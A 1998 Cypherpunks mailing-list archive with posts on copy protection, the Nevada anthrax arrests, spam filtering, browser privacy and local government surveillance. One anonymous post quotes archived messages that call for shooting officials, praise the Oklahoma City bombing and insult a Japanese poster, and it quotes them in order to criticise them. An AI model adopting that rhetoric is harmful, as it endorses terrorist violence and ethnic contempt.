To: cypherpunks@cyberpass.net
Subject: Re: Digital copy prot3ction
In-Reply-To: <199802200216.UAA09021@manifold.algebra.com>
Message-ID: <92d01a45e1bce58469855d407660b28c@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



Igor Chudov @ home wrote:

> I can hardly believe that any of these schemes are undefeatable.
>
> As soon as the CPU starts talking to a video and sound board,
> this whole thing becomes easily breakable. All one needs to do is
> to capture the signals that go to these boards and re-record them.
>
> Right?

Of course.

Such schemes usually increase the amount of piracy in the long-term,
because it encourages people to convert the material into a more easily
copied form.

If you've ever followed any of the warez scenes, what you find is
generally about 1% of the population acutally obtain and convert the
material, and the other 99% just trade copies around.  (Consider, for
example, the number of people who actually know how to dump the
contents of an eprom chip versus the number of sites where you can
download copies of nintendo/sega/etc games.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Sat, 21 Feb 1998 12:43:35 +0800
To: "Eric Cordian" <cypherpunks@cyberpass.net>
Subject: Re: The Political Education of Eric Tune
Message-ID: <199802210438.XAA03845@mx01.together.net>
MIME-Version: 1.0
Content-Type: text/plain



On 2/20/98 1:32 AM, Eric Cordian (emc@wire.insync.net)  passed this 
wisdom:

>> Listen up jerk, in case you didn't get any news during 1990, 
>> Iraq attacked Kuwait, and murdered thousands of Kuwaitis.
> 
>Iraq, mislead by the US into believing that there would be no 
>interference in its long-standing dispute with Kuwait, annexed it, 
>providing a pretense for the US to do some dirty work for the 
>Israelis, who did not want to tolerate an Arab military giant in 
>their region.
>
>Kuwait provoked Iraq far more than places like Panama and Grenada 
>have provoked the United States, when US forces poured in to remove 
>existing governments, and install regimes sympathetic to 
>Washington, also killing thousands of uninvolved civilians. 

 Somewhere in there I also remember reading about the fact that Kuwait 
was slant drilling into a major Iraqi oil field and systematically 
pumping it for all it was worth. Not exactly kosher! Many greater 
conflicts have been begun for far more trivial transgressions.


Brian B. Riley --> http://members.macconnect.com/~brianbr
  For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

  "Do not go where the path may lead, go instead where there is
    no path, and leave a trail"  - Ralph Waldo Emerson






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 21 Feb 1998 13:49:16 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Jimbelling the Sheep (fwd)
Message-ID: <199802210552.XAA28462@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Eric Cordian <emc@wire.insync.net>
> Subject: Jimbelling the Sheep
> Date: Fri, 20 Feb 1998 23:20:51 -0600 (CST)

> The FBI informant who orchestrated the capture of the recent "Anthrax
> Terrorists" turns out to be a man twice convicted of felony extortion.

In one of the news reports that I heard the informant was described as a
cancer researcher who was approached with an offer to purchase some surplus
lab equipment.


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 21 Feb 1998 13:53:36 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Some children are rabid and need to be put down (fwd)
Message-ID: <199802210556.XAA28525@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Eric Cordian <emc@wire.insync.net>
> Subject: Re: Some children are rabid and need to be put down
> Date: Fri, 20 Feb 1998 23:18:04 -0600 (CST)

> Now she may have a legitimate problem, and may have started biting and
> scratching in response to the counselor saying - "Good morning.  You look
> lovely today." 

Apparently the girls problems had been going on for a while, if the reports
are accurate. Which raises the question of why she was still in a regular
school environment in the first place. If it was a 'all of a sudden' attack
then perhaps the instructor needs some looking into as well.

I'd like to know what the 'significant blood loss' from scratches was
refering to, as well as what experience the teacher had with the child prior
to this.

> It is rarely useful to take things like this at face value, especially
> given the spin control talents of school administrators and the teachers
> union.

Agreed.


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 21 Feb 1998 13:01:51 +0800
To: cypherpunks@cyberpass.net
Subject: BBC Gnaws Crypto
Message-ID: <1.5.4.32.19980221050004.00755974@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



The BBC has a special report on encryption policy today on
its Web site, with disputes among the UK, EU and US:

http://news.bbc.co.uk/hi/english/special_report/1998/encryption/newsid_58000
/58499.stm


Thanks to Yaman Akdeniz on UK Crypto list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eristic@gryzmak.lodz.pdi.net (Marek Jedlinski)
Date: Sat, 21 Feb 1998 09:40:18 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Is spam really a problem?
In-Reply-To: <v0310280eb110d37999a3@[207.167.93.63]>
Message-ID: <34eeebcf.17966504@gryzmak.lodz.pdi.net>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:

If:

>Indeed, discussion of "what to do about spam?" periodically consumes all of
>the main lists I'm on. Discussion of spam is worse than the actual spam.

then:

Discussion of net abuse is worse than net abuse.
Discussion of theft is worse than theft.
Discussion of, hey, abortion is worse than...

Hear Mister Free-Speech talk, and shudder.

.marek



From owner-cypherpunks@Algebra.COM Sun Feb 22 03:56 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20149 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 03:56:07 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id OAA25919
	for cypherpunks-outgoing; Sat, 21 Feb 1998 14:42:09 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id OAA25907
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 14:42:03 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id LAA23054; Sat, 21 Feb 1998 11:44:08 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id LAA23049 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 11:43:59 -0800 (PST)
Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by rigel.cyberpass.net (8.8.8/8.7.3) with SMTP id LAA13561 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 11:38:41 -0800 (PST)
Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id AAA00630; Sat, 21 Feb 1998 00:34:12 -0500
Date: Sat, 21 Feb 1998 00:34:09 -0500 (EST)
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
To: Eric Cordian <emc@wire.insync.net>
cc: cypherpunks@cyberpass.net
Subject: Re: Jimbelling the Sheep
In-Reply-To: <199802210520.XAA03328@wire.insync.net>
Message-ID: <Pine.BSF.3.91.980221003100.613B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: TEXT/PLAIN; charset=US-ASCII
Content-Length: 5317




The local radio station just played a soundbite explaining that the 
"Anthrax" was not viable, and could not have been used to develop a 
weapon. They went on to state that the perpetrator was a "disgruntled scam 
artist whose scheme to make money off the Internet had failed."

If they can't get anything out of the bio weapons angle, there's always 
the 'net angle. The news goobers are catching onto the concept of "object 
re-use."


On Fri, 20 Feb 1998, Eric Cordian wrote:

> The FBI informant who orchestrated the capture of the recent "Anthrax
> Terrorists" turns out to be a man twice convicted of felony extortion.
>  
> He presently markets something called "The AZ-58 Ray Tube Frequency
> Instrument Prototype" which he advertises as being able to somehow
> purify the body of bacteria and viruses.
>  
> Sounds like a rehash of Radionics.
>  
> You may view the contraption at its very own web site,
>  
>          http://home.sprynet.com/sprynet/jmckenzie
>  
> -----
>  
>  
> LAS VEGAS (AP) -- Far from planning an anthrax attack, William Leavitt
> Jr. was involved in a bizarre deal to buy a $2 million germ-killing
> machine from an FBI informant who double-crossed him, Leavitt's
> lawyers said Friday.
>  
> Leavitt was described by his attorneys as a well-meaning, if gullible
> scientist.
>  
> He and Larry Wayne Harris, both microbiologists, were arrested in
> suburban Henderson Wednesday outside a medical office and charged with
> conspiracy to possess and possession of a biological agent.
>  
> His lawyers said Leavitt was operating under the assumption that what
> Harris had was Anthrax vaccine, which is legal and safe.
>  
> The FBI was awaiting tests Friday to determine if it was vaccine or
> material grade anthrax, which is potent enough to kill thousands of
> people.
>  
> Leavitt is married with three children and runs his own
> fire-protection business. The FBI says he also owns microbiological
> laboratories in his hometown of Logandale, Nev., and Frankfurt,
> Germany.
>  
> His criminal attorney, Lamond Mills, said the FBI's informant, Ronald
> Rockwell, was trying to ``scam'' Leavitt into buying a germ-killing
> machine.
>  
> ``When he couldn't scam 'em, he went the other way. He became a good
> guy for the FBI,'' Mills said.
>  
> Leavitt's business lawyer, Kirby Wells, said the machine was called
> the AZ-58 Ray Tube Frequency Instrument Prototype, and was hyped by
> Rockwell in glossy brochures as being able to flush the body clean of
> bacteria and viruses.
>  
> ``It looked like a bunch of bells and whistles,'' said Wells, who said
> he saw a picture of the machine. ``What made my client believe there
> was substance to that thing, I don't know. I wish I did.''
>  
> A promotion on the Internet has a bold headline: ``ANTHRAX,'' and goes
> on to say the AZ-58 ``can treat large numbers of people at the same
> time.''
>  
> ``Has the greatest health discovery in history been suppressed?'' the
> ad asks.
>  
> Leavitt was close to buying the machine in a $2 million deal, but
> wanted to test it before making a $100,000 down-payment and arranged
> to fly Harris to Las Vegas about a week ago to help, said Wells.
>  
> Leavitt believed that Harris was transporting anthrax vaccine, Mills
> said. But Rockwell told the FBI that Leavitt described it as
> military-grade.
>  
> On the''NBC Nightly News'' Friday, Rockwell reiterated that Leavitt
> and Harris said they had military grade anthrax.
>  
> ``They lied on what they were going to do,'' Rockwell said. ``It
> scared me so bad.''
>  
> There is no phone listing for Rockwell in the Las Vegas area. His
> attorney has not returned calls to The Associated Press.
>  
> Leavitt and Harris were arrested Wednesday night after the FBI, with
> Rockwell's help, tailed the men to a medical office in suburban
> Henderson. Authorities removed a cooler and petri dishes from the
> office, and sealed the men's beige Mercedes in plastic before
> transporting it to an Air Force base.
>  
> Leavitt, 47, and Harris, 46, of Lancaster, Ohio, are being held
> without bond.
>  
> In an affidavit, the FBI said described Rockwell as a cancer research
> scientist who was convicted of felony extortion in 1981 and 1982. But
> the FBI has vouched for his credibility, saying he came forward
> without getting a deal and was a ``citizen performing his civic
> duty.''
>  
> Harris' attorney, Michael Kennedy, said Thursday that Rockwell's
> credibility ``is something we're going to look into.''
>  
> It was unclear how Leavitt, a Mormon bishop with strong political
> ties, got hooked up with Harris, an alleged white supremacist who has
> been plugging his self-published book about germ warfare.
>  
> The FBI has said Harris met Rockwell last summer at a Denver science
> conference, while Leavitt's attorneys said they believed Rockwell got
> the men together.
>  
> Mills said the results of the FBI tests will determine if they remain
> united in their defense. ``If the tests come back non-toxin, there is
> no case,'' said Mills. ``If it comes back military grade, then whoa,
> time out, that's not our fault. We separate from (Harris)
> completely.''
> 
> -- 
> Eric Michael Cordian 0+
> O:.T:.O:. Mathematical Munitions Division
> "Do What Thou Wilt Shall Be The Whole Of The Law"
>  
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 21 Feb 1998 15:06:57 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Should the Feds ban spam? (fwd)
Message-ID: <199802210709.BAA28924@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 20 Feb 1998 22:36:38 -0800
> From: Bill Stewart <bill.stewart@pobox.com>
> Subject: Re: Should the Feds ban spam? (fwd)

> >At 16:36 -0600 2/15/98, Jim Choate wrote:
> >>Newspaper editors work according to policies and trusts empowered by the
> >>owners of the paper. They are allowed as a function of the views of the
> >>owners to express that choice as an *employee* of those owners. Those
> >>policies do not apply to the readers as would happen in the case of an ISP.
> >>Unless you propose that each person should have multiple accounts at
> >>multiple ISP's.
> 
> At 06:43 PM 2/15/98 -0500, Declan McCullagh wrote:
> >This is so incoherent that it's not possible to turn into a positive statement.

It means the employee's of the paper act as agents of the owners and not as
direct right-holders of the paper itself. In other word the job of the
editor, not his civil right as an owner, is what gives them the privilige at
the behest of the owners to edit what appears in the paper.

The only people who have a right to 'freedom of the press' are the people
who *own* the press. Employees don't have rights, per se, in this only
duties and responsibilities to carry out the desires of the owners.

Now if we address the issue, as some proposed, of ISP's having 'global
filtering' rules (eg "All cyberpromo.com accounts are filtered") *and* the
purchaser may for some reason *want* to recieve cyberpromo.com traffic they
are left with the only option of going to a second (or third, or ...) ISP
in order to get what they want.

> I found it pretty easy to parse, though incorrect -
> Jim assumes that each person will only deal with one ISP,

Not at all, I assume that people can deal with as many ISP's as they have
money for. What I do assume is that if we expect ISP's to filter spam they
have only a single option open to them. That option is to impliment a
filtering policy based upon an interview and oversight by the purchasers of
that account. This will increase the costs of Internet access far above the
current levels. This increase in cost will naturaly strain already limited
budgets and force some people to drop secondary (or tertiary, or ...)
accounts because of this basic access price increase.

> and that getting spam filtering from that ISP means turning
> over control of all your incoming mail/news to the ISP.

Not at all, the purchaser defines a spam policy that the ISP impliments.
Whatever filtering the recipient wants to do over and above this is left
unremarked. However, for an ISP to filter ones email to determine if it fits
the policy the purchaser/recipient has defined they *will* be required to
review *all* incoming mail. Otherwise how do they determine if it fits one
of the categories that were defined in the contract, whether we look at it
from the perspective of what to filter or what to pass along and let the
customer process on their own.


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 21 Feb 1998 15:19:17 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Public transportation open to terrorism [CNN]
Message-ID: <199802210724.BAA29014@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>                     STUDY: PUBLIC TRANSIT INVITES TERRORISM
>                                        
>      graphic February 20, 1998
>      Web posted at: 6:59 p.m. EST (2359 GMT)
>      
>      WASHINGTON (AP) -- The arrests in Nevada of two men accused of
>      possessing anthrax or its precursor highlight the findings of a
>      recent federal report warning that public buses and trains are
>      vulnerable to terrorist attack.
>      
>      Indeed, an FBI affidavit said that one of the Nevada men had talked
>      about plans to spread bubonic plague toxins in the New York City
>      subway system.
>      
>      "For those determined to kill in quantity and willing to kill
>      indiscriminately, public transportation offers an ideal target," the
>      report said.
>      
>      The report was commissioned by the U.S. Department of Transportation
>      and written last year by terrorism expert Brian Jenkins.

[text deleted]

>      Amy Coggin, a spokeswoman for the American Public Transit
>      Association, the trade group for public transportation authorities,
>      said in an interview: "There are multiple entry points (to transit
>      systems), most of them on a street. There's no way screen everybody
>      who walks down a street. Unless we're going to become a police
>      state, you won't see that thing happening."

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Sat, 21 Feb 1998 12:01:29 +0800
To: cypherpunks@cyberpass.net
Subject: The Eloquence of Timothy C. May
Message-ID: <199802210345.EAA21038@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>From the archives.  Check for yourself if you don't believe me.

9 May 1997:
> Chiles and his co-conspirators should be shot for high crimes against the
> Constitution. After Clinton, Freeh, Kerrey, and the other traitors.
>
> Every day that passes, I'm more convinced that McVeigh did the right thing.
> Some innocents died, but, hey, war is hell. Broken eggs and all that.


12 Nov 1997:
> At 10:37 PM -0700 11/12/97, Nobuki Nakatuji wrote:
> >There are RC4 sourcecode in ftp.replay.com.
> >but, Is it  same RC4 developed RSADSI ?
> >
> 
> It am developed.
> 
> You go back where you came. You go back hotmail. We tired your stupid
> questions on RC4 and your Misty posts.
> 
> Sayonara!
> 
> (And they wonder why we kicked Japan's butt.)
> 
> --Tim May


26 Sep 1997:
> At 8:00 PM -0700 9/26/97, Nobuki Nakatuji wrote:
> >Does anybody want MISTY algorithm ?
> >If you want it,Please send e-mail to me.
> >
> 
> I thought we got rid of your sorry ass two weeks ago!
> 
> Go back to trying to arrange "male penpals," which Dejanews shows to be
> your activity on the Net prior to this recent playing of Misty.
> 
> You go, chop chop.


Sad, isn't it?


From owner-cypherpunks@Algebra.COM Sun Feb 22 00:11 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA19759 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 00:11:42 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id LAA23328
	for cypherpunks-outgoing; Sat, 21 Feb 1998 11:03:24 -0500 (EST)
Received: from galaxy.galstar.com (root@galaxy.galstar.com [204.251.80.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id LAA23287
	for <cypherpunks@ALGEBRA.COM>; Sat, 21 Feb 1998 11:03:16 -0500 (EST)
Received: from toad.com (toad.com [140.174.2.1])
	by galaxy.galstar.com (8.8.5/8.8.5) with ESMTP id IAA15936
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 08:08:22 -0600 (CST)
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id FAA07686 for cypherpunks-unedited-outgoing; Sat, 21 Feb 1998 05:52:35 -0800 (PST)
Received: from hercules.globalpac.com (MAIL.GLOBALPAC.COM [206.170.230.3]) by toad.com (8.7.5/8.7.3) with ESMTP id FAA07681 for <cypherpunks@toad.com>; Sat, 21 Feb 1998 05:52:33 -0800 (PST)
Received: from [207.215.173.133] by hercules.globalpac.com
          (Post.Office MTA v3.1.2 release (PO205-101c) ID# 9-31337L)
          with ESMTP id AAA70 for <cypherpunks@toad.com>;
          Sat, 21 Feb 1998 06:03:54 -0800
X-Sender: dstoler@gptmail.globalpac.com
Message-Id: <v03110701b1148b4c60aa@[207.215.173.72]>
Mime-Version: 1.0
Date: Sat, 21 Feb 1998 05:51:41 -0800
To: cypherpunks@toad.com
From: dstoler@globalpac.com (dstoler)
Subject: Request for Web Browser Information
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset="us-ascii"
Content-Length: 445


I would like to know the information my browser makes available to web sites. I use both Netscape and Internet Explorer.

Obviously web sites can determine my IP address for any given session; they can also look at cookies left by themselves and other sites.

Can anyone point me to where I can learn exactly what other information is made available (browser version?, OS version?, system name?, user name?, etc.)?

Thanks in advance.

David



From owner-cypherpunks@Algebra.COM Sun Feb 22 10:54 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20801 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 10:54:52 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id VAA29542
	for cypherpunks-outgoing; Sat, 21 Feb 1998 21:47:21 -0500 (EST)
Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34])
	by www.video-collage.com (8.8.5/8.8.5) with SMTP id VAA29528
	for <cypherpunks@Algebra.COM>; Sat, 21 Feb 1998 21:47:17 -0500 (EST)
Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id HAA02377; Sat, 21 Feb 1998 07:39:24 -0500
Date: Sat, 21 Feb 1998 07:39:22 -0500 (EST)
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
To: "William H. Geiger III" <whgiii@invweb.net>
cc: Tim May <tcmay@got.net>, cypherpunks@Algebra.COM
Subject: Re: Some children are rabid and need to be put down
In-Reply-To: <199802212106.QAA16832@users.invweb.net>
Message-ID: <Pine.BSF.3.91.980221073633.2368A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: TEXT/PLAIN; charset=US-ASCII
Content-Length: 630


> >I call things as I see them. I've heard no spin-doctoring, just reports
> >of the child's behavior, admitted by her father.
> 
> So one temper-tantrum by a 5 year old and its off to the BigHouse on
> Felony Assault Charges??

>From the sound if it; this was not "one tantrum", but a pattern of 
behavior that the parents failed to address after being requested to do so.

Would you want your children class with another child who repeatedly went 
into room-smashing rages with no appearant consequences for such behavior???

Sounds like the parents failed to "get around to" the counseling, and the 
school forced the issue.


From owner-cypherpunks@Algebra.COM Sun Feb 22 00:11 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA19736 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 00:11:20 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id LAA23385
	for cypherpunks-outgoing; Sat, 21 Feb 1998 11:04:13 -0500 (EST)
Received: from galaxy.galstar.com (root@galaxy.galstar.com [204.251.80.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id LAA23365
	for <cypherpunks@ALGEBRA.COM>; Sat, 21 Feb 1998 11:04:06 -0500 (EST)
Received: from toad.com (toad.com [140.174.2.1])
	by galaxy.galstar.com (8.8.5/8.8.5) with ESMTP id GAA10906
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 06:57:12 -0600 (CST)
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id EAA07443 for cypherpunks-unedited-outgoing; Sat, 21 Feb 1998 04:45:29 -0800 (PST)
Received: from cc00ms.unity.ncsu.edu (cc00ms.unity.ncsu.edu [152.1.1.35]) by toad.com (8.7.5/8.7.3) with ESMTP id EAA07438 for <cypherpunks@toad.com>; Sat, 21 Feb 1998 04:45:27 -0800 (PST)
Received: from c00954-100lez.eos.ncsu.edu (c00954-100lez.eos.ncsu.edu [152.1.26.74])
          by cc00ms.unity.ncsu.edu (8.8.4/US19Dec96) with SMTP
	  id HAA27317; Sat, 21 Feb 1998 07:45:21 -0500 (EST)
Date: Sat, 21 Feb 1998 07:45:20 -0500 (EST)
From: Ken Williams <jkwilli2@unity.ncsu.edu>
X-Sender: jkwilli2@c00954-100lez.eos.ncsu.edu
To: Information Security <guy@panix.com>
cc: cypherpunks@toad.com
Subject: Re:  Fwd: Big Brother Sees through walls (from the spyking list)
In-Reply-To: <199802202304.SAA05606@panix2.panix.com>
Message-ID: <Pine.SOL.3.96.980221065336.5774A-100000@c00954-100lez.eos.ncsu.edu>
X-Copyright: The contents of this message may not be reproduced in any form
X-Copyright: (including Commercial use) unless specific permission is granted
X-Copyright: by the author of the message.  All requests must be in writing.
X-Disclaimer: The contents of this email are for educational purposes only
X-Disclaimer: and do not reflect the thoughts or opinions of either myself
X-Disclaimer: or my employer and are not endorsed by sponsored by or provided
X-Disclaimer: on behalf of North Carolina State University.
MIME-Version: 1.0
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: TEXT/PLAIN; charset=US-ASCII
Content-Length: 4777


On Fri, 20 Feb 1998, Information Security wrote:

>   >   From: sunder <sunder@brainlink.com>
>   >   
>   >   1)From: "George Martin" <gmartin@kic.or.jp>
>   >   Subject: News Release: High-Tech Surveillance
>   >   
>   >   Here's a sampling of how state and federal agencies are using this
>   >   terrifying technology to spy on Americans:
>   >   
>   >   * In North Carolina, county governments use high-resolution spy satellite
>   >   photographs to search for property improvements that might increase
>   >   property tax assessments.
>
>Was this cost authorized by taxpayers?
>

I have lived in Raleigh, North Carolina my entire life (over 30 yrs).
County governments consist of an elected board of commissioners who have
the power to make such decisions and expenditures without holding public
hearings on these matters.  Unless the local media jumps on one of these
proposals weeks in advance, nobody will even know about it or have an
opportunity to petition for a public hearing.  Once the county
commisioners vote on and approve it, our money is spent and the public has
no recourse (until the next election).  Here in Raleigh, Wake County, NC,
for instance, we have a Republican county commissioner and a board of
members.  When I heard from his daughter, a personal friend, about his
plans to cut funding to drug education and rehab programs and redirect all
of those funds to the county prison system, I decided to act.  I contacted
the commissioner himself, his office, and even had lunch with his wife and
daughter to discuss this issue.  As a family friend, I thought I would at
least be able to get a friendly, receptive ear.  His wife and daughter
were in full agreement with me, but the commissioner dismissed all of my
suggestions and pleas.  In fact, he told me that I was "high on crack" for
even suggesting that he *not* cut spending to drug education and rehab
programs.  i then appealed to the media, the public, and various county
drug rehab and education facilities and tried to petition for public
hearings on the issue.  After getting stonewalled by the GOP-controlled
county board of commissioners, funding to drug rehab and education
programs was cut by over 50%.  Since that time (two years ago), drug
arrests and convictions, violent crime, murder, non-violent crimes,
and admissions to treatment centers have all risen, in all of the basic
statistical measurement categories.

Wake county taxes have increased dramatically (almost 50%), and we have
just completed building a new county jail and several county jail annex
facilities.  In both percentage and numbers, our county jail population is
at the highest rate it has ever been.

On a related note, seven of the Wake county sherriff's deputies, who all
had laptop computers (with Internet access) in their cruisers, were
recently busted for spending all of their time on the clock surfing the
web and going to porno websites and adult chatrooms.  One of the deputies
has been arrested for using a sherriff's department scanner to scan in a
picture of his genitals which he then sent to a young girl, a minor, from
his cruiser while on duty.

Additionally, the officer in charge of the weapons armory for the
sherriff's department, which contains full-auto weapons such as the HK MP5
and the M16, was recently dismissed because it was discovered that he had
been spending all of his time on the clock in another section of the
building surfing adult sites on the web.  Meanwhile, the armory was left
unlocked, deputies were unable to get their weapons serviced within a
reasonable period of time, and an M16 "disappeared".

My tax dollars at work...

>
>No amount of control over the population is enough for the U.S. Government.
>---guy
>

Next...i'll fill you in on some of the more interesting discoveries I made
while working for the NC Dept of Crime Control and Public Safety.  They
don't need satellites to watch you here in Raleigh...they have hi-tech,
hi-res cameras perched on top of all the tallest buildings, in the
projects, at selected street corners, and various other points.

so much for your privacy...

TATTOOMAN

/--------------------------[   TATTOOMAN   ]--------------------------\
| ORG: NC State Computer Science Dept    VP of The  E. H. A. P. Corp. |
| EML: jkwilli2@adm.csc.ncsu.edu         ehap@hackers.com             |
| EML: jkwilli2@unity.ncsu.edu           ehap-secure@hackers.com      |
| WWW: http://www4.ncsu.edu/~jkwilli2/   http://www.hackers.com/ehap/ |
| FTP: ftp://152.7.11.38/pub/personal/tattooman/                      |
| W3B: http://152.7.11.38/~tattooman/w3board/                         |
| PGP: finger tattooman@152.7.11.38                                   |
\----------------[   http://152.7.11.38/~tattooman/  ]----------------/



From owner-cypherpunks@Algebra.COM Sat Feb 21 16:16 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA18545 for <cypher@infinity.nus.edu.sg>;
          Sat, 21 Feb 1998 16:16:55 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id DAA19399
	for cypherpunks-outgoing; Sat, 21 Feb 1998 03:09:48 -0500 (EST)
